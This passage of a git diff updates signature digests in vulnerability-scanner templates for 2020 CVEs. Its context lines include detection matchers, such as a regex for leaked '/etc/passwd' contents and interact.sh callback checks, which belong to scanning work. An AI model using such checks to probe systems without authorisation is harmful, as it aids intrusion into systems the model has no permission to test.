b/http/cves/2020/CVE-2020-16952.yaml @@ -51,5 +51,4 @@ http: - 200 - 201 condition: or - -# digest: 4a0a00473045022062314bdf39eef15a0065fd721e382fe09ef093cd51f281e557185ae4b9633031022100a4d0ceaa8615a165aa12dec3c89609b2021ef362d42f4acc7cf17a947683d3c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207add6eb403daacbb3535f3a6be9191622fc847336410319b00881de261b2aaf6022100bd3fcc20ef8526abfb53d4cd213e781f739a8a8064494f587c412bf83561901f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 79a495a90c..79acb0f2be 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100aa7f4ef35c6fafec4560dcc7c4d37f0251d708d213b4bbe346a8eba9623e6a6c022017963b87401798f848223ededddfe04243b84c149e7a73bcb8d5792dc0998ce9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210092b03363f58b054ed603b9aec07d5c848cf319186f7f470f7ec8e08699d89d4202207c7e4aeab93df478c2f7fc23509900bcc23d07b5b1d51f917aa9b4b7ea91db0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 54b5980435..09318d2822 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f2d11a9ea9638a1e6e4b48b9867e607f80d30f258fcd1e4f7639dad12dc0e2ac022100e6f143cf638605ed69aa196ee0942bd5f8ff56fe8eb909db00aef71d61c35d4b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100aa2e49aff90c898a89ff6e7e27a186c2308f71142e627d2c3bb1f38b6ebb07c5022100ad1644276e5f26b9d31806ec1342dddb0c5b4249de43654d81f676010c4f182f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 0201ba5dca..95fcc114b4 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -68,5 +68,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210094645fa54df91728a9f7ef65253bfcdd449641f7fa5d92f6a47af77bd79034010220595b5feca80886cacda1afff77d57fbbadcb71f87b21dec8ed19e8bbc8e474c1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c21df0ada189429b4a7c959ecb38fd3df3f935f8c17b9229ec19bcb89b61d38202210087a9df0f551887564737091416da445e0bf10a738df3476fbec192800f624dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 71921fb88a..e18a4ad9e3 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -62,5 +62,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and - -# digest: 490a00463044022069414642f1da17bdd3939b71d37b590672ec80657e5a1ecf6a9b90e7b08b4249022028e49b39fa3da30fba2439b5de9ad0c018a8722f9afb0deb3cfd38265eaf58ea:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220215f8bb91791b2ae4e38207c79d124215edbcadd58e143f455050084fa899f83022100b3aa1e7e8d278d00282c6d481de9ab04ceeb691fe79eb3d44a85ae1290de125b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 22222626be..f9acf156d5 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201046ba79f5c1dbf1fb9b5b608d234eea08a6b62a4f569ffd4e997e28f807f6b502210094be8d4fa054942c72cdd39b3db6d37ea7cf95d33a061ad612bf3aa895fdd2d1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d5596fa04bdf7bb1eca9e8a33794dd6b671e305987e7c09477868d1c4c6ac33f022007f52c41c0e509b39c760dce7356518d87ad602536282fe2c6dcf5466548cf77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 183291fd9e..89fc657330 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -55,5 +55,4 @@ http: - type: kval kval: - "PHPSESSID" - -# digest: 4b0a00483046022100cb8872f30bf13bb58799756232923a21e5a3e951b44b60926ed969882f20d3c1022100890f9d4a0f85994930c1cc77bd40d1b60932fa7b0002332d0fc38596dc79c427:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a14846065f3eab0bee044e4949292a29bda51b4a75c5c7f5af7b3c454b1017f022100dad888019c932cdb2fa1ffa1b61ee0055bd39066674af87bed8201cf49d7591e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 85b1899de1..cd9addf7c0 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -48,5 +48,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr}}") && status_code == 200' - -# digest: 4b0a00483046022100f29bc9e3188b00e8d5f759a4973f31192c01c0cbed81d0f3c42859e54f8e4605022100b20789edbfefa110448926e3040dc691130a872c7d869c9edf97ebb786712f67:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bd5012405af42075c80f2a0cd6637b12ff014880c4c2f855409ce94024377572022100ab8e2e84d4ec9d19e4c5faf917afeae3e735431afac3435ec56116d9d4370ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 809d80a63f..ba794f1ba4 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -58,5 +58,4 @@ http: - "SLA Misses" - "Task Instances" condition: and - -# digest: 4b0a004830460221009115573b760f832269f9899cb011ccc56139b1aca6872a7bbc323dc263be24da022100860ea2471cbe6c7561dd57cdc74414433e6db140edfcadc430a1ca5141fb1dbe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207bb47434fda9a862f3b57457cd185c1ff510c9417db244ee6bb0d71740e681c3022100f6296bffe0cb4d430ebe97169df81c617e5ba400fcfea5a98c9ff95d549d3564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 4370bb32ce..6c32927d2d 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -38,5 +38,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100e59ba150340efdad8b7e041fa84336bd1f63ebcd1c137e466f683665cc9d4b0a02207d4a701778a9568c814503ed333a5de648b08d08dd8a3d7c8bbf9c6b3ee954b5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a90e7164d282e04cc3b496ebb5f4d7ca9bfd3fc69996cfba1817bc068604480002204f639fd51749b255858ccf574d7955ce921842af01be2650eed7cc22f76536e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 5b234824b9..869a8139a7 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -45,5 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022030b38f8fae50015437720d88c5c66d672feb102c602f25ed44a7a68bb9e74d27022100d160d3e6f684c10774e1de780c0ad4a55361b00621f2e340190f9149613be93b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f152a148bf22623fd1cca45c79aadb872e5187156b464580b7219021d9329bd02205f342eda0c0cc45d63cd6017ff321806c13b86e95a3a820c67ced4dc7ba226c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 30e9817e90..8763994b65 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100de60452b94d88d954ecbd5eb233f9d8b4b440f8c6287a633a39bd0cebc1d774f022100cca5bd3edb1b22a6a1576c55806d8ff74e7ec8c86140692ac761f95385290686:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9167934f71beaa653c119b4d41338effdbd2a2b17754dd3036a1bde4483b73a0221008f0f901af7cfb5e1259be7df3dd861fbf696fc16f6d5af46ab24ac2883cf993c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index fb5004d58c..191737cb96 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022031c4d47f9eda50a5c88a5ff8c292af7706c1dba72d2280ee01695d7928f4b07f02201f0e30d8f0a5c0f298bcd6892fad27ea35e811d366b0abdcc3938925daf26bbb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a94860e5376bde1cc0b4e41b787276697033e80f76a15dd6eb87b86452384f54022100d5857c4c8c3186f22aa27b882a4027843229eef1c2ab5150c340eaf657c79e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 323e9571b1..abeee0a288 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202f262dea25785f7032448facac280501005ece15d4f632e98c8f11103b6c39f4022023736c01c57ba29c947b3d0a0b92fc3bcef4c2781a854cbc5d6e009ee33d9fab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bb6d52a72b577ea80c9e47118bca1cc30553567557368d20ef39d3d58c73fbc6022040e71b5c2e02fda1ff37194cccd5bfcec64b4bd52104a7e8cec3b60bfeaef432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index ab4bc2ee02..13825e6aae 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ff67b52c7bac011e4e385b8bcf010c9de50aadf54e43979d2529869e5df78c4c022013b8bca1d89bfa6334da16981b968310012f5e504535a23fc207a9daad2b16a9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f307182a7e92d51d9639c78fc5240cf51e85c99824cfddea15131150ab47ada0221009b045f3796ff8feb7bac22733e50fb9dd0f421a3c791e8c05be86ffb44b7f81b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 871214c934..ac05dcdda7 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201a5f852999b73ac0c06f67637a401a781c8fd9bd24c57f1be5295ec73b1f7aad022100a6cb6dfc233c3dbaa4a488ecb3c30ec05791d5638ec96b9833736fdd0ba86e73:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ef60107f880a63320255b35fef294dd12a6d8cc342b108eb02f561c7a3b2bda6022021a4836ecbb2da919fb8cc50858f8092f50dbdc770934b28835326c2c0e7b4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index e2490bb2a3..5b42721092 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -57,5 +57,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4a0a00473045022100e72a7e74af82421c07b46329eda3b0879d00b41307c2b193acfc02fa297ff35b02206b0e73baee9f037ffde426601093b14a4a687c908c03151c877c7101567160b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f47e83d19612e592755807aad7c2ea27bce6f5e16c9e7a88d330de709324b9d022100e48d6413bc7c90b417bf38a1da67105e787b5c72d7603c3da1446afb5d6e54a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 1623c0720f..ab0e13813b 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d4541d74e95a2f7d2ba29e1d032536f86e53237bd852eaa4711ecaff9bca15fa022100fa81f16808cecf5e50a2bc95f241770c656ba37a03c9e7a2cffa7737fa0b6d34:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001d724e64c173987294651995e4d1b85407adfb00238e977b75ab2a55c51c00e02204798565b9aa214bb781b3953302564c0e3de1156deee987701df0a995e9be3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 54260fa572..c30f02951a 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009c7bfdbaac6b5e015ede90deab8f0a554724efbb4ee54c06c7775b7df717945402202b537420c1639c61507d66d3f5c03b57c8e2daf5b7f32ba2968b416246c42ac1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022020fe32f746f145ecea5268a27575a3b823affa3e3127a34f77173a97329862cb0221008dfde24fb4569d65f867691f85f6bd623c3bf8675537efc9d0795e6753ae3533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 991242fa9f..c163584442 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 500 - -# digest: 4a0a004730450221008a85ddf7e6db49b7462174bd06a7683c14e2846dd87c15f1b1168250e24b1763022007e3f0ff5f8d23d568b30dfd1c00d3df40b5db3a7f20b6dadb99ab0d07008c23:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022044a609d0ed5d2381483fe6d0ad63c34c97a76c3284f8395eb49b1d304c1c160302210088f9328b0aabc67d56330147261869850792f6750887465e51c99642c2ec8470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 21b42e950b..e016347849 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -50,5 +50,4 @@ http: - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" condition: or - -# digest: 4a0a0047304502210096f79f63ce2d3cbc7d6b77bf84f6373df7a9fdc0c54c92d98305cccd58e5dcff022048be9afd44fa82fd07182535149ba50a65d8c15f6d0a32b4a9447505af737022:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220380fc95cebe8d340c7362010058f70b241a0ae40ef006fefd26ec80be88e8bc702207c72a835622a292fe7955056ad69407ec53467198f84b43328d47e71c8f1c42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 57c72cbef0..e914f0e11c 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a7cc0ae70ade541fa00c813fa1cf6ca8da800600f1838d8b0bd75bcd59303a19022100bda5e3ef720d4b48fc49ca52b54353936f1520610b56aeb6f269122939973436:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206fef4af9605bb822bd95f75300cb8750bff83b446896ec37a659237da749108302207ba99074d88cbea639b9be99386b4beb8ed0ab9cc01912d984f1d80c83864ebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index b93db9ab28..b59638c76e 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "value=\"\"/>")' - 'contains(body_2, "DomainMOD")' condition: and - -# digest: 4a0a00473045022100d089321d050fe35b2c97c4d385e94f3196a03f1463f49685af0c701554c3257a0220149e71ee16dfcb2810f12dca378e1e796caa58549086332afeb9e915591d7a2e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022034f48bc54dadc2f138f3832dc2fe95f6739adb0a7d6dd309ea985e0949a78d2c022040724eb3d817bf287f305c9250dc386fd04880b05bcd32b1b69693b484ca1ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index e4ef8055a4..16ed870615 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -43,5 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "Hotel Booking System")' condition: and - -# digest: 4b0a00483046022100fe093f6d0077a8d86a5ed2aa0bc3ab8b4fc23cdefb47c9ebf73aa097f9b8d2000221008ec144c06640fad54312c614bf8cfd68aa19fc8c23db08b43bc0d18d188d5303:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022021e06c20d964c1161c60b05bc7ccf2f3c00a1f7e96a0dea720769896a93ea82f022100febe87ca0f0f831ec9f13cbaa9ad4be6cc7f0898492ee4cf234e186d045f8f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index d21364ab89..3f2fa3a9d0 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -65,5 +65,4 @@ http: - type: kval kval: - x_jenkins - -# digest: 490a0046304402203e9575fa9e14f493dcd80884ee9bae85ad1dc1d948e7d1b4872b26e7dbe0900702207d41ab94126eea79a5eb455005fa4b3f10ca47d5759571f6ee9d46d1e575dff4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022100d78fbede9a1d97900f867baa37683febef94a1a8be7b82de3d90298a7dcc861c021f1d7111c8f637ac763a17bf933dbe31d5bd12e75cda088d6d6d280f581a86fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index ac7406f7d4..45e8eeae1d 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dbf435b7a1c70e277cbb9ccc8ea974b9d7430b30ee400190db26f0ef8e84b8140220452ea2a537f8cd86217a2292c0d9473a911d1c5afb26f6ced8f4e5e78db0b344:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d1f637103a767763b78ec3dc1ea6a335710e981830e0a27c8ceffe7d75ac49dc02202b751ae1428c6df99f6aa628d0d91c59f997c82a417c8b3041941d01080c6745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 202b466046..a3800added 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009f8fa7febf51e5fda8b3a5480a2d85891806c09114f8ecdfcca9a25e5730fe37022100b290cee52bfc3949b933577fc57be61c0410fd0227b24bdf415b0f7248839ef4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c5e3670797164f2e539a33448697ebdcf891e985a8252d47819135ccceaec5d8022064b0fa1245b810ab6eb4376bdb630e5edd6b8f355892621ba0b65457294a6c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index fbbbb87a0c..179727de53 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -39,5 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 4b0a00483046022100fa69401e87f04da90855e24000fb51cb62bae5465a791fbe40aa627a825642bf022100a959f6901ba70b2a1034ae27604010d0340b7ddc69a462839235cd8b4b9bb371:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009ab24aaad2ec96c62076c7e0e596e4b8d950867d4dbb935148825f06a92b0dd202205069aaafe7d93f42ce718e16b363ae7a7dfbd03dbe3a4c5e93c745953a7381cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index e12eb810fe..18c4799403 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -39,5 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 4b0a00483046022100e020ff63fa6728cb59b67e906e2467ad5ffd34e84944c7062035330dfab52352022100c1036c001bb01ecab756a604e76fdc3907fb2ade82f541f1a08b9604bde43ea8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c58b39ce1bf5b5a0067ce6dc01936f842cc748beb8a6c51d18cc0e06dd27a0b0022100822655b824d676732d090b135308dea6a17b281378bcb6f0bf1cd83b80f938f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index bf8153e363..25a4491728 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -39,5 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 4a0a00473045022100e2493b3558603ccec0ce8b6378f27d40cda946f90fb0f3d84cc618441ab2aab9022007ef3fe7e7e1d29f1942fad79521d9e128ffa6d5c6709689879e8e6aaf6b1366:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f9d983b6e77543166c6e3dc2563097fb3c4386ea5fd5cca07238c3947ab0b1a8022100ea7e4f68727adbd957059de715d894f7af361276e6a1b322ae0866cf9c301c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index c6ba97d0e0..7b3507ccc4 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -39,5 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' - -# digest: 490a0046304402206a15ef0062936e6bedff54d88dbde709d1e74e01ca0e23610047074793f82b7d022069c5209e663307e66f0136b59a06b3216cac22739c4112a0e932937535a767f9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203439f99bcb323246425091618bb5b9ec62257d2321c9f1d97a64145cf553898002210088840f9990f70517940fd400f802309d179daf3ff9ebac8da2ce1c6f266e9b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index ebbcd875ad..6b9324f54f 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 4b0a00483046022100d1c1983659e1f74ca3a03b4d72a10d9a06b84ae9a25e2e59f1468fbb336e7fe70221008655c0e480ea8f8e67a2174abad98b8d6a2c49fd5127149465c4b85da6c53a9e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c8e6eced2961f973a5d8de5f9cfd11a5a55f332151f1a32d29cef25660f2adf022000dc126c76d8214618818f19dd1099c30de6dd71608e5b5f8314e3d60bc7dd41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 7b0bfd443c..81871f5cca 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -34,5 +34,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 4b0a00483046022100e7910bf4dcd036f8a47d788c1a439024bbfb9da8e117023338c73da5c06b3f43022100c54535edd55494e5218286f8becf9c99ccc0fefa029796bdecb09a23a891ed35:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e462e82638c3a83257e2271fb9c4560ec3bf4eb775dc6b16214bafac8410b07e022100cbc082d00a339ac0e712519246c1d11a6a0c25c5f6dd473ce8cc3d8a680d7a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 5fdbd812a3..ed30f12331 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022009f37015dc31bd4dd7f11d484af86646d028e218b19abf48db7a0f9ef8d9f40002200bbad166ea7a70561656a962332c3ffec47e7ab96d618b35b698b6bc2e76e625:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b088ca550285c0b5924dc4f973b3f971f3032c140959b5096ebf3720ba86d75202206bec48b7444e6d4eb776b34f51bc8d60ada2045fafa3d2fe666e077260c0a3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 4205972d68..770cd36fb1 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100968f93ac800bdda9e03398819bce09414b017e6df3c43bebea7e74695fe4b6a90221009605bcdce132db4706d5953dd25699c81845ac2f54642a6993056c8394d9e3c6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d801ba32617e2dd4c927d6e10311ebcfd7da583198e4cb9e8d45a360a2a9b1d022063f79e4103297ce23bbe012cc3bf1664ab2b5840504b2a19de7b995a6ae1dece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index ff6a7c3f7c..bed4778840 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -67,5 +67,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body - -# digest: 4b0a00483046022100d9c89952563625b84c5b03742c5c2f592eb6ba441420de1c552223dcc7c4243c022100910308dbdb3e8949d3f40fa014d77ab5163161aca648e92306bae95023bd4079:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206316044e6a1dbce90c3372b59913eb730ea8cb1044f0dee4daa0d6b99cfe804a02204fcc4d68eea41dfcf61f796b3d9572e98b2d6ca9eddac8e1828e6ed4e08d8e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index d30f2cf284..4558371a2c 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -67,5 +67,4 @@ http: regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" part: body - -# digest: 